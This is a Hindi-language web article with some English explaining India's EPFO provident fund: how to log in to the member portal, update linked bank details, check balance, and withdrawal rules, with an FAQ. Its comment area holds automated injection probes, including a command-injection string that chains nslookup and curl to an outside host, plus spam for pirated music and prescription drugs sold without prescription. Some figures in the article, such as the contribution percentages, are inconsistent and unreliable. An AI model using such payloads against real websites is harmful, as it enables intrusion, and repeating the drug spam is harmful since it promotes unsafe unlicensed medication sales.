Update Bank details in EPFO: ईपीएफओ का फूल फॉर्म कर्मचारी भविष्य निधि संगठन (Employees’ Provident Fund Organisation) है। यह एक सरकारी संगठन है, जो भारत में कर्मचारियों के भविष्य निधि खातों का प्रबंधन और क्रियान्वयन करता है। ईपीएफओ को भारत सरकार द्वारा वर्ष 1952 में कर्मचारी भविष्य निधि और प्रकीर्ण उपबंध अधिनियम के तहत स्थापित किया गया था। वर्तमान में 2021-22 की एक रिपोर्ट के अनुसार ईपीएफओ द्वारा देश में लगभग 27.74 कर्मचरियों के ईपीएफ खातों का प्रबंधन और क्रियान्वयन करता हैं।
how to update bank details in epfo? , how to change epfo password? , how to reset epfo password? , how to change bank account in epfo? , what is establishment id in epfo? , how to change password in epfo? , what is ppo number in epfo? , how to link aadhar with epfo? , how to claim epfo? , ईपीएफओ ऑनलाइन आवेदन, ईपीएफओ क्या होता है? , ईपीएफओ का फुल फॉर्म क्या है? , ईपीएफओ लॉगिन पासबुक, ईपीएफओ पोर्टल, ईपीएफओ पोर्टल केवाईसी, ईपीएफओ टोल फ्री नंबर
Update Bank details in EPFO
Update Bank details in EPFO in hindi: यदि आप शासकीय अथवा निजी क्षेत्र के कर्मचारी हैं तो आपके पास एक पीएफ खाता जरूर होगा। इस पीएफ खाते में आपके पीएफ का पैसा जमा किया जाता हैं। फिर आप इस पीएफ के पैसे को अपने बैंक खाते में ले सकते हैं। पीएफ का पैसा बैंक खाते में लेने के लिए आपका बैंक अकाउंट आपके पीएफ अकाउंट से लिंक होना चाहिए। उसके बाद ही आपके पीएफ अकाउंट में एकत्रित पैसे को विथड्रॉल कर सकते हैं।
इस पीएफ खाते से लिंक बैंक खाते को चेंज/अपडेट किया जा सकता हैं। यदि आप अपने पीएफ अकाउंट में अपना बैंक अकाउंट बदलना चाहते हैं तो यह आर्टिकल आपके काम आ सकता हैं। क्यूंकि इस आर्टिकल में हमने बताया है। कैसे आप अपने बैंक डिटेल्स को पीएफ अकाउंट में अपडेट कर सकते हो। इस आर्टिकल में हमने EPFO में बैंक खाता डिटेल्स को अपडेट करने की पूरी प्रक्रिया स्टेप-बाय-स्टेप पूरी प्रोसेस बताई हैं।
ईपीएफओ क्या होता है?
What is epfo: देश के निजी एवं शासकीय कर्मचारियों के लिए provident fund account खोलना और प्रबंधन करना, कर्मचारियों के प्रोविडेंट फंड्स कर्मचारियों के पीएफ अकाउंट में जमा करना और फण्ड निवेश करना, कर्मचारियों को सेवानिवृत्ति, विकलांगता या मृत्यु पर लाभ देना जैसे सभी काम ईपीएफओ द्वारा किये जाते हैं।
ईपीएफओ के सदस्य देश में किसी भी सेक्टर (निजी अथवा शासकीय) में कार्यरत वे सभी कर्मचारी हैं जिनका मासिक वेतन ₹15,000 या इससे अधिक है। कर्मचारी और नियोक्ता (कंपनी और सरकार) दोनों ईपीएफओ में कंट्रीब्यूट करते हैं। पीएफ खाते में कर्मचारी का योगदान उसकी मासिक सैलेरी का 12% कंट्रीब्यूट होता है, जबकि नियोक्ता (कंपनी अथवा सरकार) का कंट्रीब्यूशन कर्मचारी के मासिक वेतन का 12.5% कंट्रीब्यूशन आपके पीएफ खाते में होता है।
How to login EPFO?
Best way to Change Bank Account in EPFO: यदि आप अपने पीएफ अकाउंट में अपना बैंक खाता जानकारी बदलना चाहते हैं तो सबसे पहले ईपीएफओ मेंबर पोर्टल पर लॉगिन करें। ईपीएफओ मेंबर पोर्टल लॉगिन के लिए निम्न स्टेप्स को फॉलो करें-
स्टेप- 01. EPFO Member Portal (ईपीएफओ मेंबर पोर्टल)
अपने ईपीएफओ बैंक डिटेल्स अपडेट करने के लिए सबसे पहले ईपीएफओ पोर्टल की ऑफिसियल वेबसाइट पर जाये हैं। ईपीएफओ आधिकारिक वेबसाइट www.epfindia.gov.in हैं। आप इस पर क्लिक करके भी ईपीएफओ पोर्टल पर जा सकते हैं।
स्टेप- 02. For Employees (कर्मचारियों के लिए)
EPFO member portal की आधिकारिक वेबसाइट ओपन करने के बाद इसके होमपेज पर मुख्यमेन्यु सेक्शन में ‘For Employees (कर्मचारियों के लिए)’ के विकल्प पर क्लिक करें।
इसके बाद आपको ईपीएफओ सदस्य कर्मचारियों को ईपीएफओ पोर्टल की सभी सुविधाओं के लिए विकल्प मिल जायेंगे। इसमें आपको सर्विसेज, इम्पोर्टेन्ट लिंक्स, और पीएफ की विभिन्न जानकारियों के पीडीऍफ़ डाउनलोड करने के लिए लिंक्स/विकल्प मिल जाएगी।
स्टेप- 03. Member Passbook Member UAN/Online Service
अब इसी वेबपेज पर SERVICES सेक्शन में epfo member login के लिए आपको “Member Passbook Member UAN/Online Service” का विकल्प दिखेगा, इस पर क्लिक करें।
‘Member Passbook Member UAN/Online Service’ पर क्लिक करने से आपके सामने EPFO Member e-SEWA पोर्टल (e SEWA Portal) का एक नया वेबपेज ओपन होगा।
स्टेप- 04. EPFO e SEWA Portal
अब इस e SEWA Portal पर आपका UAN नंबर और पासवर्ड डालकर आपको लॉगिन करना पड़ेगा। e SEWA Portal पर लॉगिन करने के लिए सबसे पहले अपना UAN और पासवर्ड दर्ज़ करें। और कैप्चा कोड भरकर ‘Sign in’ बटन पर क्लिक करें।
ऊपर दिए गए कुछ आसान से स्टेप्स को फॉलो करने आप आसानी से अपने ईपीएफओ मेंबर पोर्टल पर लॉगिन कर सकते हैं। epfo member login के लिए आपको इन आसान से चरणों को अपने मोबाइल अथवा कंप्यूटर के ब्राउज़र में पूरा करना होगा। जिसके बाद आसानी से आप अपने ईपीएफओ मेंबर पोर्टल में लॉगिन कर जायेंगे। अब हम ईपीएफओ में बैंक अकाउंट डिटेल्स अपडेट की प्रक्रिया को स्टेप बाय स्टेप समझते हैं।
How to update bank details in EPFO
Update bank account in epfo: पीएफ अकाउंट में अपना बैंक खाता जानकारी बदलना चाहते हैं तो निम्न स्टेप्स को फॉलो करें-
स्टेप- 01. epfo unified portal
epfo unified portal पर लॉगिन करने के बाद आपके सामने आपकी ईपीएफओ मेंबर प्रोफाइल आ जाएगी। अब इस मेंबर प्रोफाइल में आपको कई जानकारी मिलेगी। लेकिन अभी हम केवल बैंक अकाउंट अपडेट करने के लिए यह आर्टिकल देख रहे हैं।
स्टेप- 02. Bank Account No. Update
बैंक अकाउंट बदलने के लिए मेंबर प्रोफाइल सेक्शन पर जाये और प्रोफाइल इनफार्मेशन (Profile Information) सेक्शन पर क्लिक करें। इसमें आपके आधार, पैन, बैंक अकाउंट, और मोबाइल नंबर की जानकारी आ जाएगी। इनके सामने एक एडिट बटन (Edit Button) हैं, उस पर क्लिक करें।
स्टेप- 03. Add bank account in epfo
अब ईपीएफओ में अपना बैंक अकाउंट जोड़ने अथवा बदलने के लिए Add KYC सेक्शन में जाये। Add KYC सेक्शन में आपको Bank, PAN, और Passport तीन विकल्प दिखेंगे। बैंक अकाउंट डिटेल्स अपडेट करने के लिए ‘Bank’ वाले ऑप्शन पर क्लिक करें।इसके बाद आपके सामने नया बैंक अकॉउंट जानकारी जोड़ने या बैंक अकाउंट डिटेल्स अपडेट करने का वेबपेज आ जायेगा।
इस वेबपेज पर अपना नया बैंक अकाउंट नंबर और उस बैंक ब्रांच ब्रांच का Bank IFSC भरकर सेव बटन पर क्लिक कर दें। इसके बाद आपके आधार से लिंक मोबाइल नंबर ओटीपी आएगा, उसे एंटर करके सबमिट कर दें। ईपीएफओ की तरफ से वेरिफिकेशन के बाद आपके पीएफ खाते में बैंक अकाउंट अपडेट हो जायेगा।
What is PPO number in epfo
पीपीओ नंबर का अर्थ होता है पेंशन पेमेंट आदेश (Pension Payment Order) नंबर। यह एक 12-अंकों की यूनिक संख्या होती है जो कर्मचारी भविष्य निधि संगठन (ईपीएफओ) के तहत पंजीकृत प्रत्येक पेंशनभोगी को प्रदान की जाती है। पीपीओ नंबर सभी पेंशनभोगियों के लिए बहुत ही महत्वपूर्ण होता है, क्योंकि यह कर्मचारी पेंशन योजना (ईपीएस) से संबंधित सभी लेनदेन और कम्युनिकेशन के लिए रिफरेन्स नंबर के रूप में भी कार्य करता है।
PPO number in EPFO: The acronym PPO denotes Pension Payment Order number, which is a distinctive 12-digit identifier assigned to each pensioner registered with the Employees’ Provident Fund Organisation (EPFO). The PPO number holds significant importance for all pensioners, serving as a reference number for all transactions and communications pertaining to the Employee Pension Scheme (EPS).
What is establishment id in epfo
EPFO में Establishment id एक 7-अंकीय यूनिक संख्या है जो प्रत्येक पंजीकृत संस्था को ईपीएफओ द्वारा प्रदान की जाती है। Establishment id का उपयोग संस्था और उसके कर्मचारियों की पहचान करने के लिए किया जाता है ताकि कर्मचारी भविष्य निधि और प्रकीर्ण उपबंध अधिनियम, 1952 के प्रशासन को सुनिश्चित किया जा सके।
संस्था के सभी कर्मचारियों के EPF खाते का नंबर Establishment id पर इंडिकेटेड होता है। यह EPFO चालान पर भी प्रिंटेड होता है जिसका उपयोग EMPLOYERS EPF अंशदान जमा करने के लिए करते हैं। EMPLOYERS अपनी Establishment id को अपने ईपीएफओ नियोक्ता पोर्टल खाते से आसानी से प्राप्त कर सकते हैं।
epfo kitna nikal sakte hai?
ईपीएफओ (epfo) का पैसे रेटायर्मेंट के बाद आप अपने पीएफ खाते से 100 प्रतिशत राशि विथड्रॉल कर सकते हैं। अथवा यदि आप की मृत्यु हो जाती है, तो आपके परिवार को आपके पीएफ खाते से पूरी राशि मिल जाएगी।
अन्य परिश्थितियों में आप पीएफ से इतना पैसा निकल सकते हैं-
यदि आप लगातार 2 महीने से बेरोजगार हैं, तो आप अपने पीएफ खाते से 75% राशि निकाल सकते हैं। और यदि आप दो महीने से अधिक समय से बेरोजगार हैं, तो आप शेष 25% राशि भी निकाल सकते हैं।
यदि आप अपना स्वयं का बिज़नेस करना चाहते हैं, तो आप अपने पीएफ आकउंट से 50% अमाउंट निकाल सकते हैं।
यदि आप घर खरीदना या बनाना चाहते हैं, तो आप अपने पीएफ खाते से 25% राशि निकाल सकते हैं।
यदि आप अपनी या अपने बच्चों की शिक्षा के लिए पैसे चाहते हैं, तो आप अपने पीएफ खाते से 50% राशि निकाल सकते हैं।
यदि आप या आपके परिवार के किसी सदस्य को गंभीर बीमारी या दुर्घटना का सामना करना पड़ता है, तो आप अपने पीएफ खाते से 75% राशि निकाल सकते हैं।
How to check epfo balance
epfo balance check: यदि आप अपना पीएफ अकाउंट बैलेंस चेक करना चाहते हैं तो आपके पास पीएफ अकाउंट बैलेंस चेक करने के दो तरीके हैं। पहला तरीका ऑनलाइन e SEWA Portal पर लॉगिन करके और दूसरा SMS या मिस्ड कॉल द्वारा पीएफ बैलेंस चेक कर सकते हैं।
यदि आप SMS द्वारा epfo balance check करना चाहते हैं तो सबसे पहले अपने पीएफ खाते में पंजीकृत मोबाइल नंबर से “EPFOHO UAN LAN” टाइप करें और इसे 7738299899 नंबर पर भेज दे। मेसेज सेंड होने के बाद आपके मोबाइल पर आपको एक SMS प्राप्त होगा जिसमें आपके EPFO बैलेंस की जानकारी दिखाई दे रही होगी।
यदि आप ऑनलाइन अपना epfo balance check करना चाहते हैं तो निम्न स्टेप्स को फॉलो करें-
स्टेप- 01. सबसे पहले EPFO की आधिकारिक वेबसाइट पर जाएं और अपने पीएफ अकाउंट को UAN और पासवर्ड से लॉग इन करें।
स्टेप- 02. अब यहां होमपेज पर, “Member Passbook” टैब पर क्लिक करें।
स्टेप- 03. इसके बाद आपका EPFO बैलेंस आपकी पासबुक में दिखाई देगा।
Frequently Asked Questions (FAQs)
1. ईपीएफओ क्या होता है?
ईपीएफओ का हिंदी में फुल फॉर्म कर्मचारी भविष्य निधि संगठन होता हैं। और इंग्लिश में Employees’ Provident Fund Organisation होता हैं। यह दुनिया का सबसे बड़ा सरकारी संगठन हैं जो कर्मचारियों की भविष्य निधि और पेंशन खातों को क्रियान्वित तथा प्रबंधित करता हैं।
2. पीएफ कितना कटता है?
आपके पीएफ खाते में आपकी मासिक सैलेरी का 12% पीएफ कटता है, और नियोक्ता (कंपनी अथवा सरकार) का योगदान आपके मासिक वेतन का 12.5% आपके पीएफ खाते में आता है।
3. पीएफ कितने प्रतिशत मिलता है?
पीएफ में आपका में योगदान 12% कर्मचारी + 12% नियोक्ता = 24% होता है। इस प्रकार आपको 24 प्रतिशत पीएफ मिलता हैं।
4. how to check epfo balance?
epfo balance check: सबसे पहले EPFO की आधिकारिक वेबसाइट पर जाएं और अपने पीएफ अकाउंट को UAN और पासवर्ड से लॉग इन करें। अब होमपेज पर, “Member Passbook” टैब पर क्लिक करें। और यहां आपका EPFO बैलेंस आपकी पासबुक में दिखाई देगा जिसे आप चेक कर सकते हैं।
5. What is fps in epfo?
FPS in epfo: पीएफओ में एफपीएस का मतलब पारिवारिक पेंशन योजना (Family Pension Scheme) होता है। यह एक सामाजिक सुरक्षा योजना है जो ईपीएफओ मेंबर की मृत्यु हो जाने पर उसके परिवार को आर्थिक सुरक्षा एवं वित्तीय सहायता प्रदान करती है। सदस्य की मृत्यु के मामले में, उनके परिवार को एफपीएस के तहत पेंशन मिलती हैं। एफपीएस के पात्र होने के लिए, आपको कम से कम 1 वर्ष की सेवा पूरी करनी चाहिए और कम से कम 12 महीनों के लिए ईपीएफ में योगदान देना आवश्यक होता है।
555
555
555
555
555
555
555′”()&%tSAG(9781)
555
555
&(nslookup -q=cname hittusbuuktdac1878.bxss.me||curl hittusbuuktdac1878.bxss.me)&’\”`0&(nslookup -q=cname hittusbuuktdac1878.bxss.me||curl hittusbuuktdac1878.bxss.me)&`’
555
Hello,
New club music https://0daymusic.org
Download MP3/FLAC, Label, LIVESETS, Music Videos.
Promo Music DJs
TruePills, No prescription needed, Buy pills without restrictions. Money Back Guaranteed 30-day refunds.
Viagra buy, discount! without prescription.
Cialis buy, discount! without prescription.
Viagra Professional buy, discount! without prescription.
Cialis Professional buy, discount! without prescription.
Viagra Super Active buy, discount! without prescription.
Cialis Super Active buy, discount! without prescription.
Synthroid buy, discount! without prescription.
https://cutt.ly/qwufYAl9